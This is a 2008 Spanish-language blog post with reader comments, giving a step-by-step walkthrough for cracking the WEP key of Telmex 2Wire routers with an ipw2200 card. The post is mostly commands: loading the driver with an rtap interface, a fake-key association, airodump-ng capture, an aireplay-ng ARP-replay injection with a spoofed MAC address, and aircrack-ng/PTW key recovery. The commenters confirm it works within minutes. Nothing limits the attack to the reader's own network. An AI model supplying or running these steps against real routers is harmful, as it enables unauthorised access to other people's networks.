24 febrero, 2008

inyeccion con ipw2200 sobre 2Wire de Telmex con wep de 64 bits

Muchos me decían que tenia que parchar pero no hay necesidad bueno lo que se necesita es:
1)
el paquete de aircrack-ng-0.9.1.tar.gz
el live cd backtrack2 ( o el que quieran pero que el kernel sirva xD)
tu superhiperultracheverechido modulo (tengo una thinkpad R50e) ipw2200

bueno comenzamos muchos mousedependientes me preguntan como hacerlo aqui pongo como lo hago yo:

tengo entendido que solo se pueden usar los ataques con este metodo

2 (--interactive)
3 (--arpreplay)
4 (--chopchop)


2)primero haz un scan con

iwlist dispositivo scan

y apunta el mac del AP y el canal esto es importante

3) opcional compila e instala el aircrack siempre lo hago xD ----
descarga wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz
descomprime tar -zxvf aircrack-ng-0.9.tar.gz
entra en el directorio cd aircrack-ng-0.9
compila e instala make
make install
----------------------------------------------------------------

4)ahora activamos la interfaz de rtap

quitamos el modulo de ipw2200
modprobe -r ipw2200

si ponemos
modinfo ipw2200
parm: rtap_iface:create the rtap interface (1 - create, default 0) (int)
podremos ver las opciones que tiene el modulo y de ahi podemos mirar rtap_iface

cargamos el modulo con esa opcion =)
modprobe ipw2200 rtap_iface=1

con esto activamos la interfaz rtap

5)ahora tenemos que hacer una asociación a el AP dar una clave falsa o fake esto se tiene que hacer antes de aireplay

iwconfig eth1 ap macdelap
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed

6)levantamos las interfaces

ifconfig eth1 up
ifconfig rtap0 up

si en este paso ponemos iwconfig para ver la asociación , podremos verla en el dispositivo eth1...

7)ahora corremos airodump para capturar paquetes con la interfaz rtap0
airodump-ng --channel --bssid -w jijoju rtap0
en channel ponemos el canal del ap
el bssid del ap
-w le dice que cree un archivo llamado jijoju
rtap0 es la interfase a usar
despues nos dice que clientes hay conectados

8)ahora abrimos aireplay
aireplay-ng --arpreplay -x 1024 -b bssid ap -h tumac -i rtap0 eth1
--arpreplay es el ataque
-x es el numero de paquetes por segundo
-b bssid del ap
-h tumac adress (puedes cambiarla (siempre lo hago) usando ifconfig eth1 hw ether 00:11:22:33:44:55 o lo que se te ocurra)
-i que capture de este dispositivo (s)


9)esperamos un rato yo me espero a las 100000 iv's

despues con aircrack, en este caso era de 64 bits asi que pongo el parametro , si es de 128 bits pon 128 en lugar de 64 =) si quieres una taque con PTW pon -z

aircrack -n 64 archivo.cap
aircrack -z archivo.cap (ataque ptw)




tiempo estimado ... 10 minutos
mas info aqui

4 comentarios:

Anónimo dijo...

Buen trabajo, cabe mencionar que si al AP esta distante, quiza solo te llega un 33% a 40% el resultado puede ser muy lento, probado en un AP que me llega al 90% funciona en menos de 10 minutos

Anónimo dijo...

Muy bien señor don friki

Anónimo dijo...

Gracias por los 'juegos jaba'.

¿me podrias dar algo de credito por esta entrada? o no c si si fue por esta.

Pero bueno por la qu te pase la info de como sacar la WEP con la ipw2200.

Esq resulta q no me creen y genralmente no me importa q no me crean pero hice una especie de apuesta.


Y bueno pues solo corroborar que los pasos arriba descritos funcionan muy bien.

artzneo dijo...

jajaj como que no te creen javier? pues simon este we me dijo como hacerla con el ipw2200 , que apostaste? xD